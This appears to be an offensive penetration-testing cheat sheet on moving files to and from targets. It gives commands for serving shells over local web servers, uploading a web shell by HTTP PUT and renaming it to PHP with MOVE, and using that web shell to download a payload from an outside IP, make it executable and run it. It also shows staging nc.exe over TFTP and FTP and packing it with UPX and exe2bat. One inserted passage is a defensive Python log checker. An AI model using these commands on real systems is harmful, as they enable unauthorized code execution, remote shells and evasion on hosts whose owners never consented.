File Transfers

Simple Local Web Servers

Run a basic Python 2 HTTP server, great for serving up shells etc.

python -m SimpleHTTPServer 80

Run a basic Python 3 HTTP server, great for serving up shells etc.

python3 -m http.server

Run a basic PHP HTTP server

php -S $ip:80

Mounting File Shares

Mount NFS share

mount $ip:/vol/share /mnt/nfs

HTTP Put

nmap -p80 $ip --script http-put --script-args http-put.url='/test/file.php',http-put.file='/var/www/html/file.php'

Webdav with Davtest

davtest -move -sendbd auto -url hxxp://$ip

Davtest

Upload a file using the PUT method, with the curl command

curl -T shell.txt hxxp://$ip

Rename it to an executable file using the MOVE method, with the curl command

curl -X MOVE --header Destination:hxxp://$ip/shell.php hxxp://$ip/shell.txt
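
Defender-side view of the PUT-then-MOVE sequence above, as an added example that is not part of the original page: a log check that flags a client which creates a path with PUT and then renames that same path with MOVE. The combined access-log format, the function name and every sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed format: Apache/nginx "combined" access log.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Status codes a WebDAV server returns for a PUT or MOVE that took effect.
SUCCESS = {"200", "201", "204"}

def find_put_then_move(lines):
    """Return (client, path) pairs where a successful PUT of a path is later
    followed by a successful MOVE of the same path from the same client."""
    uploaded = defaultdict(set)  # client -> paths it created with PUT
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] not in SUCCESS:
            continue  # unparseable line or rejected request
        client, method, path = m["client"], m["method"], m["path"]
        if method == "PUT":
            uploaded[client].add(path)
        elif method == "MOVE" and path in uploaded[client]:
            hits.append((client, path))
            uploaded[client].discard(path)
    return hits

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "PUT /shell.txt HTTP/1.1" 201 0 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "MOVE /shell.txt HTTP/1.1" 201 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "PUT /notes.txt HTTP/1.1" 403 199 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "MOVE /notes.txt HTTP/1.1" 403 199 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "MOVE /report.txt HTTP/1.1" 201 0 "-" "cadaver/0.23"',
]

if __name__ == "__main__":
    for client, path in find_put_then_move(SAMPLE):
        print(f"ALERT {client}: PUT followed by MOVE of {path}")
```

Default access logs do not record the Destination header, so the check keys on the source path; logging that header, or disabling PUT and MOVE where WebDAV is not needed, closes the gap.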

Upload shell using limited php shell cmd

Use a web shell to download and execute the meterpreter

curl -s --data "cmd=wget hxxp://174.0.42.42:8000/dhn -O /tmp/evil" hxxp://$ip/files/sh.php
curl -s --data "cmd=chmod 777 /tmp/evil" hxxp://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" hxxp://$ip/files/sh.php

TFTP

mkdir /tftp
tftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/

FROM WINDOWS HOST

C:\Users\Offsec>tftp -i $ip get nc.exe

FTP

apt-get update && apt-get install pure-ftpd
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Packing Files

upx -9 nc.exe

exe2bat converts an EXE to a text file

locate exe2bat

wine exe2bat.exe nc.exe nc.txt